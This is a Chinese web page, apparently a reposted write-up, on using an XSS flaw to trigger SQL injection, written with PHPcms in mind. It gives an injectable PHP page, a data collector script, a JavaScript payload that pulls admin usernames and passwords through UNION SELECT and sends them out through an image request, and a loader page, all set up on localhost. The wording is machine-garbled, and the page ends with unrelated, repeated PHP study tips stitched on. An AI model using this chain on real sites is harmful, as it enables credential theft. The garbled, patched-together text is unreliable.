PHP网页设计PHPcms使用xss履行sql注入
在学习HTML中我想边学边做是最有效的方式,当然这一方式对于学习PHP同样是最有效的。 昨天看见phpcms v9.1.15爆的xss和无权限的sql注入,因而就想测试下使用xss履行sql注入,固然爆的这个phpcms破绽还有良多其他的用法!然而,这个注入我没有找到phpcms v9.1.15测试,其他版本都没有测试胜利!因而乎我只要设想下一个极端情况:
1.前台有且只要一个xss破绽(不克不及获得办理员cookie)
2.后台有且只要一个sql注入破绽(注入破绽文件只要办理员可以会见)
3.注入取得办理员暗码可解密
4.除以上无其他任何破绽(包含后台getwebshell)其实我就是想说,咱们只可以使用这个xss履行注入!
摹拟注入破绽代码
[*] sqli.php
01 <?php
02 @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);//毛病疏忽
03 $con = mysql_connect("localhost","root","");
04 if(!$con) {die('Could not connect: ' . mysql_error());}
05 mysql_select_db("test",$con);
06 $id = $_GET['xss'];
07 $sql = "select id,realname from test where id="."$id";
08 $view = mysql_query($sql);
09 $row = mysql_fetch_array($view);
10 echo $row."<br />";
11 echo $row."<br />";
12 ?>
[*] mysql数据库:
1 database:test
2 table:test、admin
3 column:test.id、test.realname
4 admin.id、admin.username、admin.password
[*] get.php(获得的注入后数据截取)
1 <?php
2 $file = fopen("data.txt","a");
3 fwrite($file,$_GET['get']);
4 fclose($file);
5 ?>
[*] xsssqli.js(payload)
01 function addLoadEvent(func)//窗口翻开加载多个函数
02 {
03 var oldfunc=window.onload; //页面翻开是加载办法
04 if(typeof(window.onload)!="function")
05 {
06 window.onload=func;
07 }
08 else
09 {
10 window.onload=function()
11 {
12 oldfunc();
13 func();
14 }
15 }
16 }
17 function get_xsssqli()
18 {
19 var url = "http://127.0.0.1/xss/sqli.php?xss=1%20and%201=2%20union%20select%20username,password%20from%20admin";
20 var ajax = null;
21 if(window.XMLHttpRequest)
22 {
23 ajax = new XMLHttpRequest();
24 }
25 else if(window.ActiveXObject)
26 {
27 ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本
28 }
29 else
30 {
31 return;
32 }
33 ajax.open("GET", url, true);
34 ajax.send(null);
35 ajax.onreadystatechange = function()
36 {
37 if(ajax.readyState == 4 && ajax.status == 200)
38 {
39 var img = document.createElement("img");
40 img.src = "http://127.0.0.1/xss/get.php?get="+ajax.responseText;
41 document.body.appendChild(img);
42 }
43 }
44 }
45 addLoadEvent(get_xsssqli);
[*] 摹拟xss破绽
1 <html>
2 <head>
3 <title>use xss to sqli</title>
4 </head>
5 <body>
6 <script src=http://127.0.0.1/xss/get.js ></script>
7 </body>
8 </html>
最初胜利失掉数据:
固然你也能够写个正则截获指定命据! 来自:http://superman.php100.com/ 一些真正的强人总会搞出新玩意来丢给你,你不学就落后了,也印证了前人的经验,果然是学无止境啊! 做为1门年轻的语言,php一直很努力。 Apache不是非得用80或者8080端口的,我刚开始安得时候就是80端口老占用,就用了个 81端口,结果照常,就是输localhost的时候,应该输入为 localhost:81 再就是混迹于论坛啦,咱们的phpchina的论坛就很强大,提出的问题一般都是有达人去解答的,以前的帖子也要多看看也能学到不少前辈们的经验。别的不错的论坛例如php100,javaeye也是很不错的。 我还是强烈建议自己搭建php环境。因为在搭建的过程中你会遇到一些问题,通过搜索或是看php手册解决问题后,你会更加深刻的理解它们的工作原理,了解到php配置文件中的一些选项设置。 这些都是最基本最常用功能,我们这些菜鸟在系统学习后,可以先对这些功能深入研究。 爱上php,他也会爱上你。 对于初学者来说不推荐去拿钱买的。当然如果一个网站你经常去用,而且里面的资料也比较有用,最好还是买个会员比较好,毕竟那些也是别人的工作成果。 当留言板完成的时候,下步可以把做1个单人的blog程序,做为目标, 首先我是坚决反对新手上来就用框架的,因为对底层的东西一点都不了解,造成知识上的真空,会对以后的发展不利。我的观点上手了解下框架就好,代码还是手写。当然啦如果是位别的编程语言的高手的话,这个就另当别论啦。 环境搭建好,当你看见你的浏览器输出“it works\\\\\\\"时你一定是喜悦的。在你解决问题的时候,我强烈建议多读php手册。 开发工具也会慢慢的更专业,每个公司的可能不一样,但是zend studio是个大伙都会用的。 本人接触php时间不长,算是phper中的小菜鸟一只吧。由于刚开始学的时候没有名师指,碰过不少疙瘩,呗很多小问题卡过很久,白白浪费不少宝贵的时间,在次分享一些子的学习的心得。 爱上php,他也会爱上你。 我要在声明一下:我是个菜鸟!!我对php这门优秀的语言也是知之甚少。但是我要在这里说一下php在网站开发中最常用的几个功能: 我要在声明一下:我是个菜鸟!!我对php这门优秀的语言也是知之甚少。但是我要在这里说一下php在网站开发中最常用的几个功能: ,熟悉html,能用div+css,还有javascript,优先考虑linux。我在开始学习的时候,就想把这些知识一起学习,我天真的认为同时学习能够互相呼应,因为知识是相通的。 开发工具也会慢慢的更专业,每个公司的可能不一样,但是zend studio是个大伙都会用的。 当留言板完成的时候,下步可以把做1个单人的blog程序,做为目标, 真正的方向了,如果将来要去开发团队,你一定要学好smarty ,phplib这样的模板引擎,
页:
[1]